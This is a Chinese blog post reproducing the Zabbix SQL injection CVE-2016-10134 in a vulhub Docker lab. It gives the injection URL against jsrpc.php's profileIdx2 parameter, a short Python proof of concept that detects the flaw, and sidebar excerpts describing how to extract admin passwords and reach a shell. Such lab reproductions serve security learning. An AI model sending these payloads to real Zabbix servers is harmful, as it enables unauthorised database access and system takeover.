zabbix latest.php SQL注入漏洞(CVE-2016-10134)复现,python编写POC

最新推荐文章于 2023-12-27 16:03:32 发布
最新推荐文章于 2023-12-27 16:03:32 发布
阅读量264 收藏
点赞数
分类专栏: 漏洞复现 文章标签: python 安全漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqiao258/article/details/120603879
版权

环境搭建:

使用vulhub,进入对应文件夹启动环境:


[root@localhost CVE-2016-10134]# cd /home/vulhub/zabbix/CVE-2016-10134/
[root@localhost CVE-2016-10134]# docker-compose up -d

查看端口:


[root@localhost CVE-2016-10134]# docker ps
CONTAINER ID   IMAGE                        COMMAND                  CREATED          STATUS                             PORTS                                   NAMES
186d17fe3db4   vulhub/zabbix:3.0.3-server   "/docker-entrypoint.…"   37 seconds ago   Up 35 seconds (health: starting)   162/udp, 10051/tcp                      cve-2016-10134_agent_1
61dac6a6b384   vulhub/zabbix:3.0.3-web      "/docker-entrypoint.…"   37 seconds ago   Up 35 seconds (healthy)            0.0.0.0:8080->80/tcp, :::8080->80/tcp   cve-2016-10134_web_1
00cf5df981b0   mysql:5                      "docker-entrypoint.s…"   39 seconds ago   Up 38 seconds                      3306/tcp, 33060/tcp                     cve-2016-10134_mysql_1
[root@localhost CVE-2016-10134]#

漏洞复现:

访问
http://192.168.10.10:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,user()),0)
在这里插入图片描述

POC编写:

import requests


url = "http://192.168.10.10:8080/"

poc = "jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,md5('wwwq')),0)"

res = requests.get(url + poc)
if "afece6b64dc8eff8b9bd078a5f" in res.text:  #  wwwq  的 md5  值
    print("CVE-2016-10134   存在")

pycharm运行结果:
在这里插入图片描述

~王
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zabbix SQL注入漏洞CVE-2016-10134
SoulCat
01-26 7130
zabbix SQL注入漏洞CVE-2016-10134漏洞概述: zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbixlatest.php中的toggle_ids[]或jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。 漏洞版本: 2.2.x 3....
Zabbix sql注入漏洞复现CVE-2016-10134
whojoe的博客
06-06 3420
Zabbix sql注入漏洞复现CVE-2016-10134)环境搭建 环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统 启动docker systemctl start docker 下载vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/zabbix/CVE-2016-10134/ 启
CVE-2016-10134 zabbix 复现
m0_46580995的博客
11-02 193
注入点1 需要登录获取cooike后16位 /latest.php?output=ajax&sid=【cooike zbx——sessionid后16位】&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0) 注入点2 jsrpc.php 无需登录 /jsrpc.php?type=0&mode=1&method=screen.get&pro
Zabbixcve-2016-10134漏洞复现
hh27644607523的博客
06-26 119
登录之后查看cookie中的zbx_sessionid并复制后16位。拉取镜像docker-compose up -d。也可以通过jsrpc.php触发,且无需登录。使用guest账号登录无需密码。将后16位作为值拼接访问。访问ip 8080端口。
Zabbix登录绕过漏洞 [CVE-2022-23131].md
07-09
Zabbix登录绕过漏洞 [CVE-2022-23131]
zabbix-agent.tar.gz
07-28
Zabbix-Agent是一款强大的开源监控软件,它在IT基础设施管理领域占据着重要地位。"zabbix-agent.tar.gz" 是Zabbix Agent的压缩包文件,通常用于在目标系统上部署该代理服务。这个特定的版本被描述为一个修改后的采集...
zabbix-release-6.0-1.el7.noarch.rpm
04-08
zabbix-release-6.0-1.el7.noarch.rpm
BUU一血![Zabbix]CVE-2016-10134
qq_43801002的博客
04-25 911
zabbixzabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 zabbix server可以通过SNMP,zabbi...
Zabbix sql注入漏洞(CVE-2016-10134)
最新发布
m0_65150886的博客
12-27 909
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbixlatest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
zabbix latest.php SQL注入漏洞CVE-2016-10134
菜鸟耿耿
10-07 1474
zabbix latest.php SQL注入漏洞CVE-2016-10134zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 一.环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,进入后台后script等功能直接获取zabbix服务器的操作系统权限。 攻击机IP:192.168.35.128 靶机IP: 192.168.35.1
zabbix SQL注入漏洞CVE-2016-10134
jammny
12-04 383
漏洞详情 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。前端页面jsrpc.php的参数profileIdx2以及后端latest.php页面中的参数toggle_ids[]存在SQL注入,攻击者可以通过此漏洞 漏洞影响 Zabbix 2.2.14之前 Zabbix 3.0~3.0.4 漏洞利用 如果可以使用guest用户进行登陆,那么可以通过账号为guest密码为空进入后台,通过抓包记住自己cookie
[CVE-2016-10134]zabbix sql注入实测
Delphinidae
11-19 304
参考链接:vulhub 目的:熟悉和复现漏洞做治理内部发现的漏洞 漏洞注入点:profileIdx2 漏洞路由:/jsrpc.php这个文件 漏洞环境:搭建vulhub docker环境 用brupsuite 抓包开始复现漏洞,确认漏洞是否存在,那当前用户数据用户名 user(),可见有root用户返回,证明漏洞存在。 报错注入的漏洞存在。 sql注入漏洞存在,下一步是取出关键信息,zabbix取出Admin的密码就可以控制该系统的所有主机了,那么开始取数据,通过zabbix相关信息查到登陆用户密码
[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞CVE-2016-10134
qq_51577576的博客
08-14 3480
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
Zabbix登录绕过漏洞复现(CVE-2022-23131)
MrHatSec的博客
04-06 6029
Zabbix登录绕过漏洞复现(CVE-2022-23131)
Zabbix 再次被爆出存在 SQL 注入漏洞,影响云上数百网站
weixin_34356310的博客
08-18 115
0x00 前言 昨晚,Zabbix 被爆出一个高危的 SQL 注入漏洞。这个漏洞本身需要登录触发,但因为大部分 Zabbix 都启用了 guest 账号,导致访客在访问 Zabbix 时默认都会带上 guest 权限。有了guest权限后,触发这个漏洞的条件“需要登录”就不存在了,相当于一个前台的 SQL 注入漏洞。所以,外部媒体转载...
dnf install zabbix-server-mysql zabbix-web-mysql zabbix-nginx-conf zabbix-sql-scripts zabbix-selinux-policy zabbix-agent
05-29
dnf install zabbix-server-mysql zabbix-web-mysql zabbix-nginx-conf zabbix-sql-scripts zabbix-selinux-policy zabbix-agent ``` 安装完成后,您需要按照 Zabbix 官方文档中的说明来配置 Zabbix Server 和 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值